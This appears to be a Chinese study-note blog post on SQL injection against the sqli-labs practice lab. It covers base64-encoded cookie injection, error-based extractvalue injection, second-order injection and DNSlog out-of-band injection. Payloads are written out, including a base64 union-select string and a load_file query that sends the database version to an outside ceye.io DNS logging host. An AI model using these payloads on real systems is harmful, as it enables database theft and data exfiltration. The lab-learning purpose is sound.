Web漏洞-SQL注入之二次、加密、DNS加密注入

实例1:sqli-labs21

输入admin,admin 测试:

可以看到注入点在cookie处,发送到decoder(解密)

所以如果要注入,需要将注入语句加密

Eg:admin’ and 1=1加密后:YWRtaW4ZIGFuZCAxPTEK

(19条消息) sql注入之报错注入silence1的博客-CSDN博客_报错注入

0x7e='~'

concat('a', 'b')=“ab”version()=@@version

~可以换成'#'、$'等不满足xpath格式的字符

extracvalue()能查询字符串的最大长度为32,如果我们想要的结果超过32,就要用substring()函数截取或limit分页,一次查看最多32位

查询注入点

Payload:

-----JykgdW5pb24gc2VsZWN0IDEsMiwzIw==

------后续步骤详情见sqli-labs

二次注入:

在注册页面注册一个新用户:batman’#

修改密码

查看到密码被更新的是dhakkan,原理:

二次注入一般无法通过人工或工具扫描得出,一般都需要配合代码去分析

Dnslog注入:解决了盲注不能回显数据,效率低的问题

Eg:

CEYE - Monitor service for security testing

Payload:select * from users where id=1 and if((select load_file(concat('\\',(select version()),'llpd8b.ceye.io\abc'))),1,0);

DNSlog注入工具:

GitHub - ADOOO/DnslogSqlinj

Sqli-labs9

dnslogSql.py -u http://192.168.32.1/sqli-labs/Less-9/?id=1' and ({})--+

相关推荐

  1. SQL注入注入

    2024-03-25 20:58:03       8 阅读

最近更新

  1. TCP协议是安全的吗?

    2024-03-25 20:58:03       17 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-03-25 20:58:03       16 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-03-25 20:58:03       15 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-03-25 20:58:03       18 阅读

热门阅读

  1. 【笔试】美团2024年春招第二场笔试(技术)

    2024-03-25 20:58:03       21 阅读
  2. Linux的目录结构和文件管理命令

    2024-03-25 20:58:03       17 阅读
  3. webpack原理之-打包流程&热更新HMR

    2024-03-25 20:58:03       21 阅读
  4. Linux学习笔记:重定向与缓冲区

    2024-03-25 20:58:03       19 阅读
  5. 2024.03.10 校招 实习 内推 面经

    2024-03-25 20:58:03       19 阅读